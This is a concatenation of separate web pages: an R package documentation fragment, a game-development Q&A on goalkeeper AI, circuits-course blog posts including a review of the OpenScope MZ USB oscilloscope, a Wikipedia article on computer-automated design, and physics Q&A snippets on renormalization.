Critical value
TeXDescription
LaTeX-friendly description of current row
## Examples
1 2 3 # 90% critical value: CVb(B = 1, alpha = 0.1) CVb(B = c(0, 0.5, 1), alpha = c(0.05, 0.1))
kolesarm/RDHonest documentation built on April 3, 2018, 11:08 a.m. | 2018-11-18 19:18:48 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5018121004104614, "perplexity": 5047.582711149763}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-47/segments/1542039744561.78/warc/CC-MAIN-20181118180446-20181118202446-00355.warc.gz"} |
https://gamedev.stackexchange.com/questions/66769/goalkeeper-jumping-algorithm | # Goalkeeper Jumping Algorithm?
This may be a "best way to" question, so may be susceptible to opinion-based answers (which is ok for me). But I would also like if there are any tutorials , research papers , etc.
I'm trying to make a 3D free kick game, and I want to decide on the Goalkeeper algorithm.
Usually (and in my game) the shot is a function of direction , power and swerve. Maybe wind can be a factor too. So the shots trajectory is pre-deterministic, i.e., the point that intersects the goal (or out) plane is determined as soon as the shot fires.
So what could be a good approach for the goalkeeper to jump (or walk) ?
I have two approaches in mind :
1- determine the point, and jump to there. 2- when the ball is closer than a threshold distance, estimate the point by the ball's velocity vector, and jump to there.
The problem with the first approach is, goalkeeper will always save the shot, which I want to prevent. So there should be some kind of randomness, or the goalkeeper's ability to jump and walk will be restricted.
The problem with the second approach is, when there is a high amount of swerve, the goalkeeper will always fail to save the shot.
So how could these approaches be better?
Thanks for any help !
## Edit:
• Think Pong AI; The paddle can only move so fast. It has to try and guess where the ball is going and position itself accordingly. If it guesses right, it has a good chance of stopping the ball, if it guesses wrong, it'll likely miss. The goal keeper has a small area around him where he can move very quickly, in the form of jumping. This is a movement he can only use once. Your question is a "best way" type question. While you may be OK receiving opinion based answers, that's not the purpose of this site. I suggest you implement something and come back with specific problems if there are any. – MichaelHouse Dec 4 '13 at 14:32
• Just played the game: very fun! I played for about 30 mins to get the feel of it, and I think your keeper-AI is spot on. I've played FIFA games and the like for a few years now, and I can say the game feels pretty natural as well. – igrad Mar 14 '14 at 6:05
You know where the ball will hit the goal, and you know when this will happen. So you could set up some basic variables such as "reaction speed", "movement speed" and/or "jumping force".
A goal-keeper with a high reaction- and movement-speed will be able to catch most shots, while a goal-keeper with worse stats won't be able to do so.
If you have the ball-travel time t, and the player reaction time rt, then the effective time for the player to react will be t - rt. This is the time he has to move from his position to the position where the ball will hit the goal. So if (t - rt) * movement_speed > distance_to_ball, then the ball can be saved.
Of course it should become gradually more difficult to catch a ball that's further away from the keeper. Also you might want to introduce some kind of randomness... so the rule could be:
if( distance_to_ball / ((t - rt) * movement_speed) <= RAND() ){
// ball catched
}
Where RAND() would return a random float between 0 and 1.
The "Swerve" could just be some factor that reduces the players actual time to react.
Also instead of using a linear approach like above, you could experiment with another falloff (cubic, exponential etc.), so that shots fired really close to the goalkeeper have a much higher chance of getting caught.
I think the most important aspect is that the gameplay is fun and diverse. There's so much luck involved in saving a penalty-shot, that a realistic simulation/algorithm isn't going to produce much better results than something close to completely random.
Try to tweak the formula in a way that it rewards skill (eg. if you practice to land good shots, your chances of scoring are increased) but still allows a complete newcomer to score a goal as well.
• I got a good idea from these comments. Randomness could be a function of distance. i.e., the closer the shot, the more the randomness is. Thanks ! – jeff Dec 4 '13 at 16:00
• Another factor, which occurs in FIFA's penalty kicks: the keeper has to anticipate the shot's target, and has to move that way to block. So they will sometimes guess poorly and fail by diving the wrong way, or by diving at all when they should have stay centered. – Seth Battin Dec 6 '13 at 23:09
• @Seth Battin haha. my keeper does that too :) – jeff Dec 30 '13 at 10:48
In reality, a goalkeeper needs to do two things:
1. watch the ball and notice when its trajectory will cause it to fly into the goal
2. when this is the case, jump into the way
(a real soccer fan will now likely tell me about 20 other jobs a soccer goalkeeper has to perform, but bear with me, I am a nerd who hates sports).
To perform these jobs, the goalkeeper has to react quickly and correctly. When the kick is performed from a longer distance and the player isn't shooting very fast, the keeper will have a longer time to react and will be more likely to catch it. But a shot from a close distance could not leave the keeper enough time to react at all or when he reacts, the surprise might cause him to react incorrectly. The performance of a goalkeeper isn't consistent. There are cases of amateur keepers catching seemingly impossible shots or world-class keepers making stupid blunders in harmless situations. Both occurences aren't frequent, but they happen from time to time. So a certain element of chance should be part of your AI.
To simulate this, you could give the AI keeper a certain probability per physics-tick to react on a goal-shot and perform the necessary action to prevent it (it might already be too late to do this succesfully, but it would look more human when he would try anyway). When the keeper reacts, you could also give them an additional probability to react incorrectly. This probability should be antiproportional to the distance which is left, so that "stupid mistakes" are more likely to happen in difficult situations than in easy ones. The exact probabilities could be variable depending on the skill-level of the keeper and/or your difficulty level.
My team is working in a Football MMO and our approach is to attribute goal keepers (and other players) with several attributes, such as JUMP, PHYSIQUE, AGILITY, REACTION, REASON, POSITIONING, to name a few. The probability to perform a task is then a weighted sum of the attributes of the player related to that task. In your case, the task is to defend the shoot. You can model this as simple or complex as you like, depending on the quantity of skills used. You can also save presets of the skills set and use them depending on the difficulty, for example. Finally, to get some randomness, just simulate a dice and use it to check if the returned value is within the probability threshold. If it is, the shoot is defended. If not, it is a goal.
As of playing as a goalkeeper, I have to suggest these: Not all keepers have the same ability to jump, intelligence or reflects. As stated before, a goalkeeper always looks at the ball - and in real world, a good response is to move so that the goalkeeper will always cover the ball no matter how far it is from the goal if a straight shot is achieved.
An idea could be this: the keeper is moving on side based on the ball. When a shot is performed, the goalkeeper will "fall" (put his body in the angle of the potential position of the ball when it reaches the goal line) and fall (with animation) after a while. The keeper will jump (move horizontally, vertically or diagonally up for a while and then fall) if the potential position of the ball on the line is in bigger distance than its body length.
The delay of this move can be associated with the reflects of the keeper and the how high will it jump with the skills. Now, about intelligence, you could set a random indicator of when it will be confused by the curve (and jump in wrong way or with delay). The higher the skill, the less the probability to get confused. Jump delay, height and confusion can probably be enough for simple cases (if the goalkeeper jumps with delay or not far enough, then a goal can be achieved).
And again this is very generic, and just the way I think of it.
The ways to handle this are different based on how you are assigning speed, swerve etc. I'm assuming you have a skill challenge to do that ("stop the moving needle in the right part of the gauge"-type thing or something similar). If so, then you want higher-swerve and higher-speed to equal higher-percentage chance of scoring. If they are just chosen values, then they shouldn't have such a direct effect, or the player will always choose them to be high.
You could set a percentage of the time you want the goalkeeper to save (based on the speed and swerve), and simply pick a random number, if it's below that percentage, play the correct animation (diving the right way) for the save, if it's higher, play the wrong one and allow the score. This is simple, but also a little "cheating"-like.
You could set an amount of time for the goalie to read the direction the ball is going, and then start moving him in that direction, and constantly allow him to adjust for the swerve until the last X% of the time it takes the ball to arrive, at which point the goalie can dive for the ball if it's within a range of where he is (and outside "move-to" range). "Better" goalies (higher levels?) will read sooner, move faster, and dive later(and further). This is more complicated, but more flexible, and more simulation-like.
• In my game, freekick shots are very similar to PES games. You adjust the direction (left - right) , then you adjust swerve (a point on the ball's surface), then the power. Your second approach is very similar to the one I've been using in my previous game. So I guess I need to improve that one :) Thanks ! – jeff Dec 5 '13 at 15:18 | 2020-10-26 05:07:49 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5857119560241699, "perplexity": 1011.4198566967956}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-45/segments/1603107890273.42/warc/CC-MAIN-20201026031408-20201026061408-00433.warc.gz"} |
https://gasstationwithoutpumps.wordpress.com/page/2/ | # Gas station without pumps
## 2019 January 8
### Struggles with Canvas
Filed under: Circuits course — gasstationwithoutpumps @ 11:30
Tags: ,
Yesterday (2019 Jan 7) was a crazy day for me.
I got up early to walk my son down to the bus station for his trip back to college, then bought groceries, walked home, had breakfast, and cycled to work. It was the first day of class, so I had meetings with my teaching team (5 undergrads, but one was snowed in at Tahoe and unable to make the meetings—there were two meetings, because no time worked for all five students).
I spent most of the day struggling with “Canvas” the learning management system that the campus makes us use. Setting up courses on it is a major pain, even if all you use it for is turning in assignments and grading them. My course has 12 homeworks, 6 prelab reports, and 5 design reports, plus about 10 quizzes. One of the problems is that each assignment takes many mouse clicks to create— setting the name, the due date, the number of points, the grace period for submission, whether it is a group assignment, what group set it is associated with … . Setting up lab groups the way I wanted turned out to be impossible in Canvas. I wanted random pairs, respecting section boundaries, with no pair of students working together twice. Even the simplest version of this (doing random pairings without the no-repetition constraint) didn’t work in Canvas, which tried creating one group of 3 and one singleton, for a section with an even number of students.
I figured that it would be easiest for me to create the pairings on my own computer and upload them to Canvas. But Canvas doesn’t have any way to upload group assignments! The only way it supports instructor-assigned groups would have required about 1000 mouse clicks. I ended up doing the assignments on my computer and posting them on the class bulletin board, telling the students to enter themselves into the assigned lab groups. I hope that this did not violate any FERPA rules (I checked the summary provided to faculty and it looked ok, but it would have been better for Canvas to have permitted uploads, so that I didn’t need to worry).
Lecture went ok, but afterwards I found that one of the figures in my book had gotten messed up between the Dec 15 and Dec 30 releases, and I had to come up with a new way to create the figure and re-release the book. LeanPub is nice in that anyone who has bought the book can pick up the new releases for free. I think some of my students haven’t figured this out yet, as there have been more uses of the free coupon I issued than there are students in the course.
So I was continually busy from 6am when I got up to midnight when I got to bed. This morning I went for a 1.5km run in light rain before breakfast, created the quiz for tomorrow’s class, and cycled up to campus for office hours, faculty meeting, and 4 hours of instructional lab. Today is (probably) not going to be as hectic as yesterday was.
The new complex-number exercises in the book have prompted a couple of students to come in for help, as they did not really understand Euler’s formula. I ended up redrawing and re-explaining the figure from the book, and that seemed to help them. I’m hoping that this complex-number review will make it easier for them when we get to complex impedances.
### One figure has been giving me grief for a long time
Filed under: Circuits course — gasstationwithoutpumps @ 09:22
Tags: , , ,
There is one figure in my book that has been giving me trouble for a long time:
A Moiré pattern figure for the sampling and aliasing chapter that was giving me trouble.
The figure itself is very simple, and it should have been no trouble at all. I created the figure in hand-written SVG, and all the SVG readers (Inkscape, Preview, and browsers) had no trouble rendering it on the screen. But when Inkscape converted it to PDF (using the Cairo library, I believe), it threw away the black bars in the background. When I asked Inkscape to print the image to PDF, it rotated the image.
For a while, I got away with rerotating the image in Preview and saving the result, but the file got damaged or deleted at some point, and redoing the rotation in Preview no longer worked—pdflatex seemed to have no idea that there was a rotation nor a bounding box any more. (I think Preview changed when I upgraded the mac OS on my laptop.) This change happened between the 2018 Dec 15 and 2018 Dec 30 releases of the book, so the Dec 30 release had a messed-up figure without my realizing it.
Yesterday evening, I noticed the problem and set about trying to fix it. Nothing I could do with Inkscape or Preview seemed to work—I either ended up with no black bars or with the image rotated and scaled wrong. (Viewing the individual image with Preview sometimes worked—but the inclusion by pdflatex was failing in those cases.)
Finally, I decided that since Inkscape was incapable of rendering in PDF the pattern-fill I was using to create the bars, that I would give up on pattern fill to create them. Instead I used a Python program to generate separate rectangles. Inkscape had no trouble converting that longer but less sophisticated SVG program to PDF, and I was able to fix the figure.
Because this figure was messed up in the “final” release of 30 Dec 2018, I did a quick re-release last night, fixing this figure and a bunch of typos students had found. Yesterday was the first day of class, and students have already reported 7 errors in the book (one reported after yesterday’s release, so it is still in the current version at LeanPub).
This year’s class seems to be very diligent, as all the students had the book downloaded by the first day of class, and some had started on the homework.
## 2019 January 6
### OpenScope MZ review: Bode plot
Filed under: Circuits course,Data acquisition — gasstationwithoutpumps @ 14:47
Tags: , , ,
Continuing the review in OpenScope MZ review, I investigated using the OpenScope MZ for impedance analysis (used in both the loudspeaker lab and the electrode lab).
Waveforms Live does not have the nice Impedance Analyzer instrument that Waveforms 3 has, so impedance analysis is more complicated on the OpenScope MZ than on the Analog Discovery 2. It can be done well enough for the labs of my course, but only with a fair amount of extra trouble.
There is a “Bode Plot” button in Waveforms Live, which performs something similar to the “Network Analyzer” in Waveforms, but it uses only a single oscilloscope channel, so the setup is a little different. I think I know why the Bode plot option uses only one channel, rather than two channels—the microcontroller gets 6.25Msamples/s total throughput, which would only be 3.125Msamples/s per channel if two channels were used. In contrast, the AD2 gets a full 100Msamples/s on each channel, whether one or two is used, so is effectively 32 times faster than the OpenScope MZ.
We still make a voltage divider with the device under test (DUT) and a known reference resistor, and connect the waveform generator across the whole series chain. Because there is only one oscilloscope channel, we have to do two sweeps: first one with the oscilloscope measuring the input to the series chain (using the “calibrate” button on the Bode panel), then another sweep measuring just across the DUT. The sweeps are rather slow, taking about a second per data point, so one would probably want to collect fewer data points than with the AD2. Also there is no short or open compensation for the test fixture, and the frequency range is more limited (max 625kHz).
The resulting data only contains magnitude information, not phase, and can only be downloaded in CSV format with a dB scale. It is possible to fit a model of the voltage divider to the data, but the gnuplot script is more awkward than fitting the data from the impedance analyzer:
load '../definitions.gnuplot'
set datafile separator comma
Rref=1e3
undb(db) = 10**(db*0.05)
model(f,R,C) = Zpar(R, Zc(f,C))
div(f,R,C) = divider(Rref, model(f,R,C))
R= 1e3
C= 1e-9
fit log(abs(div(x,R,C))) '1kohm-Ax-Bode.csv' skip 1 u 1:(log(undb($2))) via R,C set xrange [100:1e6] set ylabel 'Voltage divider ratio' plot '1kohm-Ax-Bode.csv' skip 1 u 1:(undb($2)) title 'data', \
abs(div(x,R,C)) title sprintf("R=%.2fkohm, C=%.2fnF", R*1e-3, C*1e9)
The fitting here results in essentially the same results as the fitting done with the Analog Discovery 2.
Although the Bode plot option makes the OpenScope MZ usable for the course, it is rather awkward and limited—the Analog Discovery 2 is still a much better deal.
## 2019 January 5
### OpenScope MZ review
During the CyberWeek sales I bought myself an OpenScope MZ USB scope from Digilent, to see how it compared with the Analog Discovery 2, which I use frequently. I particularly wanted to see whether I could recommend it as a low-cost alternative ($89 list) for the AD2 ($279 list, but \$179 with academic discount).
I’ve not had a chance to do much testing yet, but the short answer is that I would recommend saving up for the Analog Discovery 2—the OpenScope MZ is nowhere near being a professional instrument, but the AD2 is close.
The first thing I tested was the function generator. The OpenScope MZ does not have a real DAC, but uses digital output pins and a resistor ladder to generate analog voltages. The result is a “DAC” that is non-monotonic. The non-monotonicity can be observed by generating a sawtooth waveform and observing the result with an Analog Discovery 2.
The non-monotonicity is worst when the DAC switches from 0x1ff to 0x200 (from 511 to 512 out of 1024 steps). This was a 3Vpp sawtooth at 10Hz. The OpenScope MZ also has a much larger offset than the AD2.
To get clean measurements, I set the AD2 to average 100 traces. I also did 16-fold oversampling, so that I could get good time resolution while recording the whole period.
The steps are not of uniform duration, but don’t seem to be a simple pattern of single or double clock pulses:
The step durations vary here from 64µs to 136µs in this small sample, but with 1024 steps in 0.1s, I would expect 97.66µs.
The step heights are not completely consistent either, but seem to average to roughly the right value:
The step size should be 3V/1024=2.93mV, but in this range the average step size is a little high. (but the first step at the bottom left is too small). The variable duration of the steps is also very visible here.
The speed limitations of the amplifier for the OpenScope’s function generator are also quite clear:
There seems to be a 12V/µs slew rate limitation, and the large step at the end of the sawtooth has a 258ns fall time. By way of contrast, the AD2 has about a 40ns fall time for the same 10Hz ramp up and a slew rate of about 120V/µs.
I found the Analog Discovery 2 falling edge rather interesting—the stepwise descent may be an artifact of recording the waveform with the same instrument used for generating it (so that the oversampling does not work correctly), but it might also indicate that the ramp edge is digitally pre-filtered to keep it from overshooting.
### Series-parallel and parallel-series indistinguishable
Filed under: Circuits course — gasstationwithoutpumps @ 00:52
Tags: ,
I was looking at 3-component circuits for the impedance tokens, to make more challenging targets for students to identify than the 2-component RC ones. Here are two of the circuits I was looking at:
Series-parallel : R1+(R2||C2) and Parallel-series: R4||(R3+C3)
I realized over the past couple of days that these two circuits are indistinguishable with an impedance spectrum, if you don’t know any of the R or C values.
The series-parallel circuit has impedance $R_1 + \frac{R_2}{1+j\omega R_2 C2}$, which can also be written as $\frac{R_1+R_2 + j\omega R_1 R_2 C_2}{1+ j\omega R_2 C_2}$.
The parallel-series circuit has impedance $\frac{R_4 \left(R_3 + 1/(j \omega C_3)\right)}{R_4 + R_3 + 1/(j \omega C_3)}$ which can be written as $\frac{R_4 + j \omega R_3 R_4 C_3}{1 + j \omega (R_3+R_4) C_3}$.
If we are given R1, R2, and C2, we can set $R_4 = R_1+R_2$ and $R_3 = R_4 \frac{R_1}{R_2}$ to get the same impedances for both circuits at DC and infinite frequency. If we set $C_3 = C_2 \frac{R_1 R_2}{R_3 R_4}$, then the impedances are identical for the two circuits at all frequencies.
There is one way that we can distinguish between the circuits, but it is pretty subtle, relying on thermal effects. The overall power dissipation is the same for both circuits with any given input voltage waveform, but the heat will be distributed differently. At high frequencies, the energy is dissipated in R1 and in both R3 and R4, but at low frequencies the energy is dissipated in both R1 and R2 or in R4. The thermal masses will be different in the two cases, and so the temperature rise will be different, which can theoretically be detected by differences in the noise spectra of the thermal noise from the resistors.
If the resistors were mounted on a sufficiently thermally conductive substrate, so that the temperature rise was the same for both resistors in each circuit, then even this subtle detection would not be possible.
A similar analysis of the impedances can be made if R1 and R4 are replaced by capacitors C1 and C4, so there are really only two distinguishable 3-component RC circuits: R1+ (R2||C2) and C1 + (R2||C2). Others either reduce to one of these or reduce even further to 2-component or 1-component circuits.
« Previous PageNext Page » | 2019-01-21 17:56:26 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 7, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5293800830841064, "perplexity": 1642.0640069850474}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-04/segments/1547583804001.73/warc/CC-MAIN-20190121172846-20190121194846-00154.warc.gz"} |
https://en.wikipedia.org/wiki/Computer-automated_design | # Computer-automated design
Design Automation usually refers to electronic design automation, or Design Automation which is a Product Configurator. Extending Computer-Aided Design (CAD), automated design and Computer-Automated Design (CAutoD)[1][2][3] are more concerned with a broader range of applications, such as automotive engineering, civil engineering,[4][5][6][7] composite material design, control engineering,[8] dynamic system identification,[9] financial systems, industrial equipment, mechatronic systems, steel construction,[10] structural optimisation, and the invention of novel systems.
The concept of CAutoD perhaps first appeared in 1963, in the IBM Journal of Research and Development,[1] where a computer program was written.
1. to search for logic circuits having certain constraints on hardware design
2. to evaluate these logics in terms of their discriminating ability over samples of the character set they are expected to recognize.
More recently, traditional CAD simulation is seen to be transformed to CAutoD by biologically-inspired machine learning[11] or search techniques such as evolutionary computation,[12][13] including swarm intelligence algorithms.[3]
## Guiding designs by performance improvements
Interaction in computer-automated design
To meet the ever-growing demand of quality and competitiveness, iterative physical prototyping is now often replaced by 'digital prototyping' of a 'good design', which aims to meet multiple objectives such as maximised output, energy efficiency, highest speed and cost-effectiveness. The design problem concerns both finding the best design within a known range (i.e., through 'learning' or 'optimisation') and finding a new and better design beyond the existing ones (i.e., through creation and invention). This is equivalent to a search problem in an almost certainly, multidimensional (multivariate), multi-modal space with a single (or weighted) objective or multiple objectives.
## Normalized objective function: cost vs. fitness
Using single-objective CAutoD as an example, if the objective function, either as a cost function ${\displaystyle J\in [0,\infty )}$, or inversely, as a fitness function ${\displaystyle f\in (0,1]}$, where
${\displaystyle f={\tfrac {J}{1+J}}}$,
is differentiable under practical constraints in the multidimensional space, the design problem may be solved analytically. Finding the parameter sets that result in a zero first-order derivative and that satisfy the second-order derivative conditions would reveal all local optima. Then comparing the values of the performance index of all the local optima, together with those of all boundary parameter sets, would lead to the global optimum, whose corresponding 'parameter' set will thus represent the best design. However, in practice, the optimization usually involves multiple objectives and the matters involving derivatives are lot more complex.
## Dealing with practical objectives
In practice, the objective value may be noisy or even non-numerical, and hence its gradient information may be unreliable or unavailable. This is particularly true when the problem is multi-objective. At present, many designs and refinements are mainly made through a manual trial-and-error process with the help of a CAD simulation package. Usually, such a posteriori learning or adjustments need to be repeated many times until a ‘satisfactory’ or ‘optimal’ design emerges.
## Exhaustive search
In theory, this adjustment process can be automated by computerised search, such as exhaustive search. As this is an exponential algorithm, it may not deliver solutions in practice within a limited period of time.
## Search in polynomial time
One approach to virtual engineering and automated design is evolutionary computation such as evolutionary algorithms.
### Evolutionary algorithms
To reduce the search time, the biologically-inspired evolutionary algorithm (EA) can be used instead, which is a (non-deterministic) polynomial algorithm. The EA based multi-objective "search team" can be interfaced with an existing CAD simulation package in a batch mode. The EA encodes the design parameters (encoding being necessary if some parameters are non-numerical) to refine multiple candidates through parallel and interactive search. In the search process, 'selection' is performed using 'survival of the fittest' a posteriori learning. To obtain the next 'generation' of possible solutions, some parameter values are exchanged between two candidates (by an operation called 'crossover') and new values introduced (by an operation called 'mutation'). This way, the evolutionary technique makes use of past trial information in a similarly intelligent manner to the human designer.
The EA based optimal designs can start from the designer's existing design database or from an initial generation of candidate designs obtained randomly. A number of finally evolved top-performing candidates will represent several automatically optimized digital prototypes.
There are websites that demonstrate interactive evolutionary algorithms for design. EndlessForms.com allows you to evolve 3D objects online and have them 3D printed. PicBreeder.org allows you to do the same for 2D images.
## References
1. ^ a b Kamentsky, L.A., and Liu, C.-N. (1963). Computer-Automated Design of Multifont Print Recognition Logic, IBM Journal of Research and Development, 7(1), p.2
2. ^ Brncick, M. (2000). Computer automated design and computer automated manufacture, Phys Med Rehabil Clin N Am, Aug, 11(3), 701-13.
3. ^ Li, Y., et al. (2004). CAutoCSD - Evolutionary search and optimisation enabled computer automated control system design Archived 2015-08-31 at the Wayback Machine.. International Journal of Automation and Computing, 1(1). 76-88. ISSN 1751-8520
4. ^ KRAMER, GJE; GRIERSON, DE, (1989) COMPUTER AUTOMATED DESIGN OF STRUCTURES UNDER DYNAMIC LOADS, COMPUTERS & STRUCTURES, 32(2), 313-325
5. ^ MOHARRAMI, H; GRIERSON, DE, 1993, COMPUTER-AUTOMATED DESIGN OF REINFORCED-CONCRETE FRAMEWORKS, JOURNAL OF STRUCTURAL ENGINEERING-ASCE, 119(7), 2036-2058
6. ^ XU, L; GRIERSON, DE, (1993) COMPUTER-AUTOMATED DESIGN OF SEMIRIGID STEEL FRAMEWORKS, JOURNAL OF STRUCTURAL ENGINEERING-ASCE, 119(6), 1740-1760
7. ^ Barsan, GM; Dinsoreanu, M, (1997). Computer-automated design based on structural performance criteria, Mouchel Centenary Conference on Innovation in Civil and Structural Engineering, AUG 19-21, CAMBRIDGE ENGLAND, INNOVATION IN CIVIL AND STRUCTURAL ENGINEERING, 167-172
8. ^ Li, Y., et al. (1996). Genetic algorithm automated approach to design of sliding mode control systems, Int J Control, 63(4), 721-739.
9. ^ Li, Y., et al. (1995). Automation of Linear and Nonlinear Control Systems Design by Evolutionary Computation, Proc. IFAC Youth Automation Conf., Beijing, China, August 1995, 53-58.
10. ^ Barsan, GM, (1995) Computer-automated design of semirigid steel frameworks according to EUROCODE-3, Nordic Steel Construction Conference 95, JUN 19-21, 787-794
11. ^ Zhan, Z.H., et al. (2011). Evolutionary computation meets machine learning: a survey, IEEE Computational Intelligence Magazine, 6(4), 68-75.
12. ^ Gregory S. Hornby (2003). Generative Representations for Computer-Automated Design Systems, NASA Ames Research Center, Mail Stop 269-3, Moffett Field, CA 94035-1000
13. ^ J. Clune and H. Lipson (2011). Evolving three-dimensional objects with a generative encoding inspired by developmental biology. Proceedings of the European Conference on Artificial Life. 2011. | 2018-09-24 08:16:21 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 3, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5211925506591797, "perplexity": 5983.7494001856485}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-39/segments/1537267160233.82/warc/CC-MAIN-20180924070508-20180924090908-00055.warc.gz"} |
https://socratic.org/questions/what-is-the-slope-intercept-form-of-5y-6x-10 | # What is the slope-intercept form of 5y = -6x-10?
Apr 14, 2018
$y = - \frac{6}{5} x - 2$
#### Explanation:
Slope-intercept form: $y = m x + b$, where $m$ represents slope and $b$ represents the y-intercept
$y$ has to be isolated.
$5 y = - 6 x - 10 \rightarrow$ Divide each side by 5
$y = - \frac{6}{5} x - \frac{10}{5}$
$y = - \frac{6}{5} x - 2$ | 2020-05-28 05:40:58 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 8, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8957440257072449, "perplexity": 2334.5062580252943}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-24/segments/1590347396495.25/warc/CC-MAIN-20200528030851-20200528060851-00324.warc.gz"} |
http://physics.stackexchange.com/tags/renormalization/hot | # Tag Info
17
To take a meaningful continuum limit, essentially, you need to be in regime where your field is smooth enough that a gradient expansion is possible. This is usually acheived by associating a very high energy cost to field configurations that take different values on nearest neigbours in the lattice. The continuum limit of $O(n)$ models is worked out in ...
15
The most relevant tool: the Renormalization Group. You see the lattice model at larger and larger scales, and find out which terms get more relevant, and which get more irrelevant, as you zoom out. Once you reach a fixed point, the surviving terms make up your continuous system.
12
The possible applications I can think of are in determining the phases of various QFTs. There are tons of applications like that, here are some ideas: -- If the solutions to 't Hooft's conditions are too complicated (entail too many fermions such that their contribution to the IR values of $a$ is greater that $a$ in the UV) there must be symmetry breaking, ...
11
I have written a pedagogical article about renormalization and renormalization group and I would be happy to have your opinion about it. It is published in American Journal of Physics. You'll find it also on ArXiv: A hint of renormalization. B. Delamotte
11
Renormalization is absolutely not just a technical trick, it's a key part of understanding effective field theory and why we can compute anything without knowing the final microscopic theory of all physics. One good online source that explains a nice physical example is Joe Polchinski's "Effective field theory and the Fermi surface" (and you can also look up ...
11
If you are looking for a mathematical treatment for your question you need to look at the book Fernandez-Frohlich and Sokal "Random walks, critical phenomena, and triviality in quantum field theory" Springer-Verlag, 1992. It might be out of print so if you can't get it you can also try these freely accessible articles: A. Sokal "An alternate constructive ...
10
the Standard Model just happens to be perturbatively renormalizable which is an advantage, as I will discuss later; non-perturbatively, one would find out that the Higgs self-interaction and/or the hypercharge $U(1)$ interaction would be getting stronger at higher energies and they would run into inconsistencies such as the Landau poles at extremely high, ...
10
The best way to explain renormalization is to consider what at first looks like a complete detour: Mandelbrot's fractal geometry. Developed in the 1960s and 1970s, Mandelbrot's geometry is the key idea behind major advances in statistical physics in the early 1970s, pioneered by Leo Kadanoff (mostly independently), but also associated with Alexander ...
10
